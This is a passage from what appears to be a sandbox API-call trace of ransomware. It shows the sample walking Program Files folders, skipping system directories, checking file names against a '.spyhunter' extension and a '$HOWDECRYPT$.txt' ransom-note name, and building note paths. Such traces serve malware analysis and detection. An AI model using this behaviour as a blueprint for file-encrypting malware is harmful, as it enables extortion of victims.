Flags=0x8, Size=0xd2) returned 0x32f7f8 [0085.401] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x660) returned 0x32fb30 [0085.402] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0085.402] lstrcmpiW (lpString1="Filters", lpString2="Windows") returned -1 [0085.402] lstrlenW (lpString="Windows") returned 7 [0085.402] lstrcmpiW (lpString1="Filters", lpString2="$Recycle.bin") returned 1 [0085.402] lstrlenW (lpString="$Recycle.bin") returned 12 [0085.402] lstrcmpiW (lpString1="Filters", lpString2="System Volume Information") returned -1 [0085.402] lstrlenW (lpString="System Volume Information") returned 25 [0085.402] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters") returned 58 [0085.402] lstrcmpW (lpString1="Filters", lpString2=".") returned 1 [0085.402] lstrcmpW (lpString1="Filters", lpString2="..") returned 1 [0085.402] GetProcessHeap () returned 0x2c0000 [0085.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3620c0 [0085.402] wnsprintfW (in: pszDest=0x3620c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*") returned 60 [0085.402] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0085.604] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0085.604] lstrlenW (lpString="Windows") returned 7 [0085.604] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0085.604] lstrlenW (lpString="$Recycle.bin") returned 12 [0085.604] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0085.604] lstrlenW (lpString="System Volume Information") returned 25 [0085.604] wnsprintfW (in: pszDest=0x3620c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\.") returned 60 [0085.604] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.604] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0085.604] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0085.604] lstrlenW (lpString="Windows") returned 7 [0085.604] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0085.604] lstrlenW (lpString="$Recycle.bin") returned 12 [0085.604] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0085.605] lstrlenW (lpString="System Volume Information") returned 25 [0085.605] wnsprintfW (in: pszDest=0x3620c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\..") returned 61 [0085.605] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.605] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.605] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0085.605] lstrcmpiW (lpString1="msgfilt.dll", lpString2="Windows") returned -1 [0085.605] lstrlenW (lpString="Windows") returned 7 [0085.605] lstrcmpiW (lpString1="msgfilt.dll", lpString2="$Recycle.bin") returned 1 [0085.605] lstrlenW (lpString="$Recycle.bin") returned 12 [0085.605] lstrcmpiW (lpString1="msgfilt.dll", lpString2="System Volume Information") returned -1 [0085.605] lstrlenW (lpString="System Volume Information") returned 25 [0085.605] wnsprintfW (in: pszDest=0x3620c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 70 [0085.605] StrStrIW (lpFirst="msgfilt.dll", lpSrch=".spyhunter") returned 0x0 [0085.605] lstrcmpW (lpString1="msgfilt.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0085.605] lstrcmpW (lpString1="msgfilt.dll", lpString2="_uninstalling_.png") returned 1 [0085.605] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 70 [0085.605] GetProcessHeap () returned 0x2c0000 [0085.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x3243b0 [0085.605] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x668) returned 0x32fb30 [0085.605] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0085.605] lstrcmpiW (lpString1="odffilt.dll", lpString2="Windows") returned -1 [0085.605] lstrlenW (lpString="Windows") returned 7 [0085.605] lstrcmpiW (lpString1="odffilt.dll", lpString2="$Recycle.bin") returned 1 [0085.605] lstrlenW (lpString="$Recycle.bin") returned 12 [0085.605] lstrcmpiW (lpString1="odffilt.dll", lpString2="System Volume Information") returned -1 [0085.605] lstrlenW (lpString="System Volume Information") returned 25 [0085.605] wnsprintfW (in: pszDest=0x3620c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 70 [0085.605] StrStrIW (lpFirst="odffilt.dll", lpSrch=".spyhunter") returned 0x0 [0085.605] lstrcmpW (lpString1="odffilt.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0085.606] lstrcmpW (lpString1="odffilt.dll", lpString2="_uninstalling_.png") returned 1 [0085.606] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 70 [0085.606] GetProcessHeap () returned 0x2c0000 [0085.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x324488 [0085.606] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x670) returned 0x32fb30 [0085.606] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0085.606] lstrcmpiW (lpString1="offfiltx.dll", lpString2="Windows") returned -1 [0085.606] lstrlenW (lpString="Windows") returned 7 [0085.606] lstrcmpiW (lpString1="offfiltx.dll", lpString2="$Recycle.bin") returned 1 [0085.606] lstrlenW (lpString="$Recycle.bin") returned 12 [0085.606] lstrcmpiW (lpString1="offfiltx.dll", lpString2="System Volume Information") returned -1 [0085.606] lstrlenW (lpString="System Volume Information") returned 25 [0085.606] wnsprintfW (in: pszDest=0x3620c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 71 [0085.606] StrStrIW (lpFirst="offfiltx.dll", lpSrch=".spyhunter") returned 0x0 [0085.606] lstrcmpW (lpString1="offfiltx.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0085.606] lstrcmpW (lpString1="offfiltx.dll", lpString2="_uninstalling_.png") returned 1 [0085.606] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 71 [0085.606] GetProcessHeap () returned 0x2c0000 [0085.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x324560 [0085.606] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x678) returned 0x32fb30 [0085.606] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0085.606] lstrcmpiW (lpString1="VISFILT.DLL", lpString2="Windows") returned -1 [0085.606] lstrlenW (lpString="Windows") returned 7 [0085.606] lstrcmpiW (lpString1="VISFILT.DLL", lpString2="$Recycle.bin") returned 1 [0085.606] lstrlenW (lpString="$Recycle.bin") returned 12 [0085.606] lstrcmpiW (lpString1="VISFILT.DLL", lpString2="System Volume Information") returned 1 [0085.606] lstrlenW (lpString="System Volume Information") returned 25 [0085.606] wnsprintfW (in: pszDest=0x3620c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 70 [0085.606] StrStrIW (lpFirst="VISFILT.DLL", lpSrch=".spyhunter") returned 0x0 [0085.607] lstrcmpW (lpString1="VISFILT.DLL", lpString2="$HOWDECRYPT$.txt") returned 1 [0085.607] lstrcmpW (lpString1="VISFILT.DLL", lpString2="_uninstalling_.png") returned 1 [0085.607] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 70 [0085.607] GetProcessHeap () returned 0x2c0000 [0085.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x324638 [0085.607] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x680) returned 0x32fb30 [0085.607] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0085.607] FindClose (in: hFindFile=0x335f60 | out: hFindFile=0x335f60) returned 1 [0085.607] wnsprintfW (in: pszDest=0x3620c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\$HOWDECRYPT$.txt") returned 75 [0085.607] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\$HOWDECRYPT$.txt") returned 75 [0085.607] GetProcessHeap () returned 0x2c0000 [0085.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x3307a0 [0085.607] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x688) returned 0x32fb30 [0085.607] FindNextFileW (in: hFindFile=0x335f20, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0085.607] lstrcmpiW (lpString1="GRPHFLT", lpString2="Windows") returned -1 [0085.607] lstrlenW (lpString="Windows") returned 7 [0085.607] lstrcmpiW (lpString1="GRPHFLT", lpString2="$Recycle.bin") returned 1 [0085.607] lstrlenW (lpString="$Recycle.bin") returned 12 [0085.607] lstrcmpiW (lpString1="GRPHFLT", lpString2="System Volume Information") returned -1 [0085.607] lstrlenW (lpString="System Volume Information") returned 25 [0085.607] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT") returned 58 [0085.607] lstrcmpW (lpString1="GRPHFLT", lpString2=".") returned 1 [0085.607] lstrcmpW (lpString1="GRPHFLT", lpString2="..") returned 1 [0085.607] GetProcessHeap () returned 0x2c0000 [0085.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x34f030 [0085.608] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*") returned 60 [0085.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335f60 [0086.062] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.062] lstrlenW (lpString="Windows") returned 7 [0086.062] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.062] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.062] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.062] lstrlenW (lpString="System Volume Information") returned 25 [0086.062] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\.") returned 60 [0086.062] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.062] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.062] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.062] lstrlenW (lpString="Windows") returned 7 [0086.063] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.063] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.063] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.063] lstrlenW (lpString="System Volume Information") returned 25 [0086.063] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\..") returned 61 [0086.063] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.063] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.063] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.063] lstrcmpiW (lpString1="CGMIMP32.CFG", lpString2="Windows") returned -1 [0086.063] lstrlenW (lpString="Windows") returned 7 [0086.063] lstrcmpiW (lpString1="CGMIMP32.CFG", lpString2="$Recycle.bin") returned 1 [0086.063] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.063] lstrcmpiW (lpString1="CGMIMP32.CFG", lpString2="System Volume Information") returned -1 [0086.063] lstrlenW (lpString="System Volume Information") returned 25 [0086.063] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 71 [0086.063] StrStrIW (lpFirst="CGMIMP32.CFG", lpSrch=".spyhunter") returned 0x0 [0086.063] lstrcmpW (lpString1="CGMIMP32.CFG", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.063] lstrcmpW (lpString1="CGMIMP32.CFG", lpString2="_uninstalling_.png") returned 1 [0086.063] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 71 [0086.063] GetProcessHeap () returned 0x2c0000 [0086.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x3242d8 [0086.063] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x668) returned 0x32fb30 [0086.063] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.063] lstrcmpiW (lpString1="CGMIMP32.FLT", lpString2="Windows") returned -1 [0086.063] lstrlenW (lpString="Windows") returned 7 [0086.063] lstrcmpiW (lpString1="CGMIMP32.FLT", lpString2="$Recycle.bin") returned 1 [0086.063] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.063] lstrcmpiW (lpString1="CGMIMP32.FLT", lpString2="System Volume Information") returned -1 [0086.064] lstrlenW (lpString="System Volume Information") returned 25 [0086.064] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 71 [0086.064] StrStrIW (lpFirst="CGMIMP32.FLT", lpSrch=".spyhunter") returned 0x0 [0086.064] lstrcmpW (lpString1="CGMIMP32.FLT", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.064] lstrcmpW (lpString1="CGMIMP32.FLT", lpString2="_uninstalling_.png") returned 1 [0086.064] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT") returned 71 [0086.064] GetProcessHeap () returned 0x2c0000 [0086.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x324710 [0086.064] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x670) returned 0x32fb30 [0086.064] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.064] lstrcmpiW (lpString1="CGMIMP32.FNT", lpString2="Windows") returned -1 [0086.064] lstrlenW (lpString="Windows") returned 7 [0086.064] lstrcmpiW (lpString1="CGMIMP32.FNT", lpString2="$Recycle.bin") returned 1 [0086.064] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.064] lstrcmpiW (lpString1="CGMIMP32.FNT", lpString2="System Volume Information") returned -1 [0086.064] lstrlenW (lpString="System Volume Information") returned 25 [0086.064] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 71 [0086.064] StrStrIW (lpFirst="CGMIMP32.FNT", lpSrch=".spyhunter") returned 0x0 [0086.064] lstrcmpW (lpString1="CGMIMP32.FNT", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.064] lstrcmpW (lpString1="CGMIMP32.FNT", lpString2="_uninstalling_.png") returned 1 [0086.064] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FNT") returned 71 [0086.064] GetProcessHeap () returned 0x2c0000 [0086.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x3247e8 [0086.064] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x678) returned 0x32fb30 [0086.064] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.064] lstrcmpiW (lpString1="EPSIMP32.FLT", lpString2="Windows") returned -1 [0086.064] lstrlenW (lpString="Windows") returned 7 [0086.064] lstrcmpiW (lpString1="EPSIMP32.FLT", lpString2="$Recycle.bin") returned 1 [0086.065] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.065] lstrcmpiW (lpString1="EPSIMP32.FLT", lpString2="System Volume Information") returned -1 [0086.065] lstrlenW (lpString="System Volume Information") returned 25 [0086.065] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 71 [0086.065] StrStrIW (lpFirst="EPSIMP32.FLT", lpSrch=".spyhunter") returned 0x0 [0086.065] lstrcmpW (lpString1="EPSIMP32.FLT", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.065] lstrcmpW (lpString1="EPSIMP32.FLT", lpString2="_uninstalling_.png") returned 1 [0086.065] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 71 [0086.065] GetProcessHeap () returned 0x2c0000 [0086.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x33f000 [0086.065] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x680) returned 0x32fb30 [0086.065] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.065] lstrcmpiW (lpString1="GIFIMP32.FLT", lpString2="Windows") returned -1 [0086.065] lstrlenW (lpString="Windows") returned 7 [0086.065] lstrcmpiW (lpString1="GIFIMP32.FLT", lpString2="$Recycle.bin") returned 1 [0086.065] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.065] lstrcmpiW (lpString1="GIFIMP32.FLT", lpString2="System Volume Information") returned -1 [0086.065] lstrlenW (lpString="System Volume Information") returned 25 [0086.065] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 71 [0086.065] StrStrIW (lpFirst="GIFIMP32.FLT", lpSrch=".spyhunter") returned 0x0 [0086.065] lstrcmpW (lpString1="GIFIMP32.FLT", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.065] lstrcmpW (lpString1="GIFIMP32.FLT", lpString2="_uninstalling_.png") returned 1 [0086.065] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\GIFIMP32.FLT") returned 71 [0086.065] GetProcessHeap () returned 0x2c0000 [0086.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x33f0d8 [0086.065] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x688) returned 0x32fb30 [0086.065] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.065] lstrcmpiW (lpString1="JPEGIM32.FLT", lpString2="Windows") returned -1 [0086.065] lstrlenW (lpString="Windows") returned 7 [0086.065] lstrcmpiW (lpString1="JPEGIM32.FLT", lpString2="$Recycle.bin") returned 1 [0086.065] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.065] lstrcmpiW (lpString1="JPEGIM32.FLT", lpString2="System Volume Information") returned -1 [0086.065] lstrlenW (lpString="System Volume Information") returned 25 [0086.065] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 71 [0086.065] StrStrIW (lpFirst="JPEGIM32.FLT", lpSrch=".spyhunter") returned 0x0 [0086.065] lstrcmpW (lpString1="JPEGIM32.FLT", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.065] lstrcmpW (lpString1="JPEGIM32.FLT", lpString2="_uninstalling_.png") returned 1 [0086.065] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 71 [0086.066] GetProcessHeap () returned 0x2c0000 [0086.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x33f1b0 [0086.066] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x690) returned 0x32fb30 [0086.066] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.066] lstrcmpiW (lpString1="MS.CGM", lpString2="Windows") returned -1 [0086.066] lstrlenW (lpString="Windows") returned 7 [0086.066] lstrcmpiW (lpString1="MS.CGM", lpString2="$Recycle.bin") returned 1 [0086.066] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.066] lstrcmpiW (lpString1="MS.CGM", lpString2="System Volume Information") returned -1 [0086.066] lstrlenW (lpString="System Volume Information") returned 25 [0086.066] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 65 [0086.066] StrStrIW (lpFirst="MS.CGM", lpSrch=".spyhunter") returned 0x0 [0086.066] lstrcmpW (lpString1="MS.CGM", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.066] lstrcmpW (lpString1="MS.CGM", lpString2="_uninstalling_.png") returned 1 [0086.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 65 [0086.066] GetProcessHeap () returned 0x2c0000 [0086.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x330b08 [0086.066] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x698) returned 0x32fb30 [0086.066] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.066] lstrcmpiW (lpString1="MS.EPS", lpString2="Windows") returned -1 [0086.066] lstrlenW (lpString="Windows") returned 7 [0086.066] lstrcmpiW (lpString1="MS.EPS", lpString2="$Recycle.bin") returned 1 [0086.066] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.066] lstrcmpiW (lpString1="MS.EPS", lpString2="System Volume Information") returned -1 [0086.066] lstrlenW (lpString="System Volume Information") returned 25 [0086.066] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 65 [0086.066] StrStrIW (lpFirst="MS.EPS", lpSrch=".spyhunter") returned 0x0 [0086.066] lstrcmpW (lpString1="MS.EPS", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.066] lstrcmpW (lpString1="MS.EPS", lpString2="_uninstalling_.png") returned 1 [0086.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 65 [0086.066] GetProcessHeap () returned 0x2c0000 [0086.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x32d2b8 [0086.066] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x6a0) returned 0x32fb30 [0086.067] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.067] lstrcmpiW (lpString1="MS.GIF", lpString2="Windows") returned -1 [0086.067] lstrlenW (lpString="Windows") returned 7 [0086.067] lstrcmpiW (lpString1="MS.GIF", lpString2="$Recycle.bin") returned 1 [0086.067] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.067] lstrcmpiW (lpString1="MS.GIF", lpString2="System Volume Information") returned -1 [0086.067] lstrlenW (lpString="System Volume Information") returned 25 [0086.067] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 65 [0086.067] StrStrIW (lpFirst="MS.GIF", lpSrch=".spyhunter") returned 0x0 [0086.067] lstrcmpW (lpString1="MS.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.067] lstrcmpW (lpString1="MS.GIF", lpString2="_uninstalling_.png") returned 1 [0086.067] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.GIF") returned 65 [0086.067] GetProcessHeap () returned 0x2c0000 [0086.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x3303d8 [0086.067] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x6a8) returned 0x32fb30 [0086.067] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.067] lstrcmpiW (lpString1="MS.JPG", lpString2="Windows") returned -1 [0086.067] lstrlenW (lpString="Windows") returned 7 [0086.067] lstrcmpiW (lpString1="MS.JPG", lpString2="$Recycle.bin") returned 1 [0086.067] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.067] lstrcmpiW (lpString1="MS.JPG", lpString2="System Volume Information") returned -1 [0086.067] lstrlenW (lpString="System Volume Information") returned 25 [0086.067] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 65 [0086.067] StrStrIW (lpFirst="MS.JPG", lpSrch=".spyhunter") returned 0x0 [0086.067] lstrcmpW (lpString1="MS.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.067] lstrcmpW (lpString1="MS.JPG", lpString2="_uninstalling_.png") returned 1 [0086.067] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.JPG") returned 65 [0086.067] GetProcessHeap () returned 0x2c0000 [0086.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc4) returned 0x3304a8 [0086.067] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fb30, Size=0x6b0) returned 0x32fb30 [0086.067] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.067] lstrcmpiW (lpString1="MS.PNG", lpString2="Windows") returned -1 [0086.067] lstrlenW (lpString="Windows") returned 7 [0086.067] lstrcmpiW (lpString1="MS.PNG", lpString2="$Recycle.bin") returned 1 [0086.067] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.068] lstrcmpiW (lpString1="MS.PNG", lpString2="System Volume Information") returned -1 [0086.068] lstrlenW (lpString="System Volume Information") returned 25 [0086.068] wnsprintfW (in: pszDest=0x34f030, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG") returned 65 [0086.068] StrStrIW (lpFirst="MS.PNG", lpSrch=".spyhunter") returned 0x0 [0086.068] lstrcmpW (lpString1="MS.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.068] lstrcmpW (lpString1="MS.PNG", lpString2="_uninstalling_.png") returned 1 [0086.068] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 